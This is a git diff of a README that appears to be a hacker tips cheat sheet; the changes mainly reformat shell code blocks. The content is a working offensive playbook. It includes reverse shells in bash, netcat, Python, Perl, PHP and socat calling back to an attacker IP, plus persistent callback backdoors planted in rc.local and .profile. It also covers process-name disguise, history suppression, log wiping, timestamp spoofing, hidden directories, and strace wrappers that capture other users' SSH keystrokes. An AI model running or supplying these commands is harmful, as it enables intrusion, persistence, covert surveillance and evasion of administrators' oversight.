diff --git a/README.md b/README.md
index 8b77b9f..35d7b25 100644
--- a/README.md
+++ b/README.md
@@ -71,13 +71,13 @@ Got tricks? Send them to root@thc.org or submit a pull request.
Tell Bash to use */dev/null* instead of *~/.bash_history*. This is the first command we execute on every shell. It will stop the Bash from logging your commands.
-```
-$ export HISTFILE=/dev/null
+```sh
+export HISTFILE=/dev/null
```
It is good housekeeping to 'commit suicide' when exiting a shell:
-```
-$ alias exit='kill -9 $$'
+```sh
+alias exit='kill -9 $$'
```
Any command starting with a " " (space) will [not get logged to history](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) either.
@@ -87,16 +87,16 @@ $ id
**1.ii. Hide your command**
-```
-$ /bin/bash -c "exec -a syslogd nmap -T0 10.0.2.1/24"
-or starting as a background process:
-$ exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &
+```sh
+/bin/bash -c "exec -a syslogd nmap -T0 10.0.2.1/24"
+# or starting as a background process:
+exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &
```
Alternatively if there is no Bash:
-```
-$ cp `which nmap` syslogd
-$ PATH=.:$PATH syslogd -T0 10.0.2.1/24
+```sh
+cp `which nmap` syslogd
+PATH=.:$PATH syslogd -T0 10.0.2.1/24
```
In this example we execute *nmap* but let it appear with the name *syslogd* in *ps alxwww* process list.
@@ -105,17 +105,17 @@ In this example we execute *nmap* but let it appear with the name *syslogd* in *
Download [zap-args.c](src/zap-args.c). This example will execute *nmap* but will make it appear as 'syslogd' without any arguments in the *ps alxww* output.
-```
-$ gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl
-$ LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24
+```sh
+gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl
+LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24
```
Note: There is a gdb variant as well. Anyone?
---
**2.i. Almost invisible SSH**
-```
-$ ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"
+```sh
+ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"
```
This will not add your user to the */var/log/utmp* file and you won't show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*.
@@ -123,8 +123,8 @@ This will not add your user to the */var/log/utmp* file and you won't show up in
**2.ii SSH tunnel OUT**
We use this all the time to circumvent local firewalls and IP filtering:
-```
-$ ssh -g -L31337:1.2.3.4:80 user@server.org
+```sh
+ssh -g -L31337:1.2.3.4:80 user@server.org
```
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor).
@@ -132,8 +132,8 @@ You or anyone else can now connect to your computer on port 31337 and get tunnel
**2.iii SSH tunnel IN**
We use this to give access to a friend to an internal machine that is not on the public Internet:
-```
-$ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org
+```sh
+ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org
```
Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor).
@@ -142,8 +142,8 @@ Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 8
OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.
-```
-$ ssh -D 1080 user@server.org
+```sh
+ssh -D 1080 user@server.org
```
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through *server.org* and will appear with the source IP of *server.org*. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor).
@@ -152,8 +152,8 @@ Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is
This is the reverse of the above example. It give others access to your *local* network or let others use your computer as a tunnel end-point.
-```
-$ ssh -g -R 1080 user@server.org
+```sh
+ssh -g -R 1080 user@server.org
```
The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor).
@@ -162,26 +162,26 @@ The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now con
**3.i. ARP discover computers on the local network**
-```
-$ nmap -r -sn -PR 192.168.0.1/24
+```sh
+nmap -r -sn -PR 192.168.0.1/24
```
This will Arp-ping all local machines just like *arping*. ARP ping always seems to work and is very stealthy (e.g. does not show up in the target's firewall). However, this command is by far our favourite:
-```
-$ nmap -thc
+```sh
+nmap -thc
```
**3.ii. ICMP discover local network**
...and when we do not have nmap and we can not do broadcast pings (requires root) then we use this:
-```
-$ for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done
+```sh
+for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done
```
**3.iii. Monitor all new TCP connections**
-```
-# tcpdump -n "tcp[tcpflags] == tcp-syn"
+```sh
+tcpdump -n "tcp[tcpflags] == tcp-syn"
```
@@ -189,8 +189,8 @@ $ for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'byte
Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from the target system (could be an admin!).
-```
-# tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
+```sh
+tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
```
---
@@ -253,22 +253,22 @@ $ xxd -p -r >issue.net-COPY
**4.iv. File Encoding - Multiple Binaries**
Method 1: Using *shar* to create a self extracting shell script with binaries inside:
-```
-$ shar *.png *.c >stuff.shar
+```sh
+shar *.png *.c >stuff.shar
```
Transfer *stuff.shar* to the remote system and execute it:
-```
-$ chmod 700 stuff.shar
-$ ./stuff.shar
+```sh
+chmod 700 stuff.shar
+./stuff.shar
```
Method 2: Using *tar*
-```
-$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
+```sh
+tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
```
Transfer *stuff.tgz.b64* to the remote system and execute:
-```
-$ openssl base64 -d
@@ -284,8 +284,8 @@ Have a *screen* running on your local computer and log into the remote system fr
We use *openssl* to encode our data but any of the above encoding methods works. This command will display the base64 encoded data in the terminal and *screen* will write this data to *screen-xfer.txt*:
-```
-$ openssl base64 CTRL-a H
On your local computer and from a different shell decode the file:
-```
-$ openssl base64 -d
**4.vi. File transfer - using *screen* from LOCAL to REMOTE**
On your local system (from within a different shell) encode the data:
-```
-$ openssl base64 screen-xfer.txt
+```sh
+openssl base64 screen-xfer.txt
```
On the remote system (and from within the current *screen*):
-```
-$ openssl base64 -d
+```sh
+openssl base64 -d
```
Get *screen* to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system:
@@ -327,14 +327,14 @@ Note: Two C-d are required due to a [bug in openssl](https://github.com/openssl/
**4.vii. File transfer - using gs-netcat and sftp**
Use [gs-netcat](https://github.com/hackerschoice/gsocket) and encapsulate the sftp protocol within. It uses the Global Socket Relay Network and no central server or IP address is required to connect to the SFTP/Gsocket server (just a password hash).
-```
-$ gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host
+```sh
+gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host
```
From your workstation execute this command to connect to the SFTP server:
-```
-$ export GSOCKET_ARGS="-s MySecret" # Workstation
-$ sftp -D gs-netcat # Workstation
+```sh
+export GSOCKET_ARGS="-s MySecret" # Workstation
+sftp -D gs-netcat # Workstation
```
---
@@ -344,14 +344,14 @@ $ sftp -D gs-netcat # Workstation
Use [gs-netcat](https://github.com/hackerschoice/gsocket). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>
-```
-$ gs-netcat -s MySecret -l -i # Host
+```sh
+gs-netcat -s MySecret -l -i # Host
```
Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.
To connect to the shell from your workstation:
-```
-$ gs-netcat -s MySecret -i
+```sh
+gs-netcat -s MySecret -i
```
Use -T to tunnel trough TOR.
@@ -359,13 +359,13 @@ Use -T to tunnel trough TOR.
**5.i.b. Reverse shell with Bash**
Start netcat to listen on port 1524 on your system:
-```
-$ nc -nvlp 1524
+```sh
+nc -nvlp 1524
```
On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
-```
-$ setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &
+```sh
+setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &
```
@@ -375,49 +375,49 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work
On the remote system:
-```
-$ nc -e /bin/bash -vn 3.13.3.7 1524
+```sh
+nc -e /bin/bash -vn 3.13.3.7 1524
```
Variant if *'-e'* is not supported:
-```
-$ mkfifo /tmp/.io
-$ sh -i 2>&1 /tmp/.io
+```sh
+mkfifo /tmp/.io
+sh -i 2>&1 /tmp/.io
```
Telnet variant:
-```
-$ mkfifo /tmp/.io
-$ sh -i 2>&1 /tmp/.io
+```sh
+mkfifo /tmp/.io
+sh -i 2>&1 /tmp/.io
```
Telnet variant when mkfifo is not supported (Ulg!):
-```
-$ (touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
-$ tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio
+```sh
+(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
+tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio
```
Note: Use */tmp/.fio* if */dev/shm* is not available.
Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds.
**5.i.d. Reverse shell with Python**
-```
-$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+```sh
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
**5.i.e. Reverse shell with Perl**
-```
+```sh
# method 1
-$ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# method 2
-$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```
**5.i.e. Reverse shell with PHP**
-```
+```sh
php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
```
@@ -427,15 +427,15 @@ php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
Any of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrade the shell to a real PTY shell:
-```
-$ exec script -qc /bin/bash /dev/null # Linux
-$ exec script -q /dev/null /bin/bash # BSD
+```sh
+exec script -qc /bin/bash /dev/null # Linux
+exec script -q /dev/null /bin/bash # BSD
```
Or:
-```
+```sh
# Python
-$ exec python -c 'import pty; pty.spawn("/bin/bash")'
+exec python -c 'import pty; pty.spawn("/bin/bash")'
```
@@ -443,19 +443,19 @@ $ exec python -c 'import pty; pty.spawn("/bin/bash")'
...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:
-```
+```sh
# On the target host spwan a PTY using any of the above examples:
-$ python -c 'import pty; pty.spawn("/bin/bash")'
+python -c 'import pty; pty.spawn("/bin/bash")'
# Now Press Ctrl-Z to suspend the connection and return to your own terminal.
# On your terminal execute:
-$ stty raw -echo; fg
+stty raw -echo; fg
# On target host
-$ reset
-$ export SHELL=bash
-$ export TERM=xterm-256color
-$ stty rows 24 columns 80
+reset
+export SHELL=bash
+export TERM=xterm-256color
+stty rows 24 columns 80
```
@@ -463,7 +463,7 @@ $ stty rows 24 columns 80
...or install socat and get it done without much fiddling about:
-```
+```sh
# on attacker's host (listener)
socat file:`tty`,raw,echo=0 tcp-listen:1524
# on target host (reverse shell)
@@ -477,17 +477,17 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
-```
-$ while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done &>/dev/null &
+```sh
+while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done &>/dev/null &
```
or add to */etc/rc.local*:
-```
+```sh
nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done' &>/dev/null &
```
or the user's *~/.profile* (also stops multiple instances from being started):
-```
+```sh
fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 3600; done' &>/dev/null &
@@ -517,16 +517,16 @@ c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
Install [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS relay on the Host's private lan which is accessible through the Global Relay network without the need to run your own server (e.g. directly from your workstation):
-```
-$ gs-netcat -l -S # compromised Host
+```sh
+gs-netcat -l -S # compromised Host
```
Now from your workstation you can connect to ANY host on the Host's private LAN:
-```
-$ gs-netcat -p 1080 # Your workstation.
+```sh
+gs-netcat -p 1080 # Your workstation.
-Access route.local:22 on the Host's private LAN from your Workstation:
-$ socat - "SOCKS4a:127.1:route.local:22"
+# Access route.local:22 on the Host's private LAN from your Workstation:
+socat - "SOCKS4a:127.1:route.local:22"
```
Use -T to use TOR.
@@ -536,14 +536,14 @@ Use -T to use TOR.
**7.i. Shred & Erase a file**
-```
-$ shred -z foobar.txt
+```sh
+shred -z foobar.txt
```
**7.ii. Shred & Erase without *shred***
-```
-$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"
+```sh
+FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"
```
Note: Or deploy your files in */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot.
@@ -554,22 +554,22 @@ Note: Or delete the file and then fill the entire harddrive with /dev/urandom an
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
-```
-$ touch -r /etc/shadow /etc/passwd
+```sh
+touch -r /etc/shadow /etc/passwd
```
**7.iv. Clear logfile**
This will reset the logfile to 0 without having to restart syslogd etc:
-```
-# cat /dev/null >/var/log/auth.log
+```sh
+cat /dev/null >/var/log/auth.log
```
This will remove any sign of us from the log file:
-```
-# cd /dev/shm
-# grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
+```sh
+cd /dev/shm
+grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
```
@@ -580,24 +580,24 @@ Our favorite working directory is */dev/shm/*. This location is volatile memory
Hiding permanent files:
Method 1:
-```
-$ alias ls='ls -I system-dev'
+```sh
+alias ls='ls -I system-dev'
```
This will hide the directory *system-dev* from the *ls* command. Place in User's *~/.profile* or system wide */etc/profile*.
Method 2:
Tricks from the 80s. Consider any directory that the admin rarely looks into (like */boot/.X11/..* or so):
-```
-$ mkdir '...'
-$ cd '...'
+```sh
+mkdir '...'
+cd '...'
```
Method 3:
Unix allows filenames with about any ASCII character but 0x00. Try tab (*\t*). Happens that most Admins do not know how to cd into any such directory.
-```
-$ mkdir $'\t'
-$ cd $'\t'
+```sh
+mkdir $'\t'
+cd $'\t'
```
@@ -606,14 +606,14 @@ $ cd $'\t'
Good for quick passwords without human element.
-```
-$ openssl rand -base64 24
+```sh
+openssl rand -base64 24
```
If `openssl` is not available then we can also use `head` to read from `/dev/urandom`.
-```
-$ head -c 32 < /dev/urandom | xxd -p -c 32
+```sh
+head -c 32 < /dev/urandom | xxd -p -c 32
```
@@ -621,27 +621,27 @@ $ head -c 32 < /dev/urandom | xxd -p -c 32
Create a 256MB large encrypted file system. You will be prompted for a password.
-```
-$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
-$ cryptsetup luksFormat /tmp/crypted
-$ mkfs.ext3 /tmp/crypted
+```sh
+dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
+cryptsetup luksFormat /tmp/crypted
+mkfs.ext3 /tmp/crypted
```
Mount:
-```
-# losetup -f
-# losetup /dev/loop0 /tmp/crypted
-# cryptsetup open /dev/loop0 crypted
-# mount -t ext3 /dev/mapper/crypted /mnt/crypted
+```sh
+losetup -f
+losetup /dev/loop0 /tmp/crypted
+cryptsetup open /dev/loop0 crypted
+mount -t ext3 /dev/mapper/crypted /mnt/crypted
```
Store data in `/mnt/crypted`, then unmount:
-```
-# umount /mnt/crypted
-# cryptsetup close crypted
-# losetup -d /dev/loop0
+```sh
+umount /mnt/crypted
+cryptsetup close crypted
+losetup -d /dev/loop0
```
@@ -650,21 +650,21 @@ Store data in `/mnt/crypted`, then unmount:
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
Encrypt:
-```
-$ openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt.enc
+```sh
+openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt.enc
```
Decrypt:
-```
-$ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt
+```sh
+openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt
```
---
**9.i. Sniff a user's SSH session**
-```
-$ strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
+```sh
+strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
```
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
@@ -672,8 +672,8 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a
**9.ii Sniff a user's SSH session without strace**
The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in:
-```
-$ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
+```sh
+echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
```
Consider using [zap-args](#hya-anchor) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
@@ -683,7 +683,7 @@ Consider using [zap-args](#hya-anchor) to hide the the arguments and /dev/tcp/3.
Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0)
Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
-```
+```sh
# Cut & Paste the following into a bash shell:
# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile
@@ -691,9 +691,9 @@ echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile
# Create a log directory and our own ssh binary
mkdir -p ~/.local/bin ~/.local/logs
-cat <<__EOF__>~/.local/bin/ssh
+cat <<__EOF__ >~/.local/bin/ssh
#! /bin/bash
-strace -e trace=read -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@
+strace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@
__EOF__
cat <<__EOF__ >~/.local/bin/ssh-log
@@ -712,10 +712,8 @@ echo -e "\033[1;32m***SUCCESS***.
Logfiles stored in ~/.local/.logs/.
To uninstall cut & paste this\033[0m:\033[1;36m
grep -v 0xFD0E ~/.profile >~/.profile-new && mv ~/.profile-new ~/.profile
- rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log
- rmdir ~/.local/bin ~/.local &>/dev/null
- rm -rf ~/.local/logs/ssh-log*.txt
- rmdir ~/.local/logs &>/dev/null\033[0m"
+ rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt
+ rmdir ~/.local/bin ~/.local/logs ~/.local &>/dev/null \033[0m"
```
(thanks to Gerald for testing this)
@@ -727,13 +725,13 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u
Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. *rlwrap* comes to the rescue. It buffers all single keystrokes until *Enter* is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
Example for the receiving end of a revese tunnel:
-```
-$ rlwrap nc -vnlp 1524
+```sh
+rlwrap nc -vnlp 1524
```
Example for *SSH*:
-```
-$ rlwrap ssh user@host
+```sh
+rlwrap ssh user@host
```
---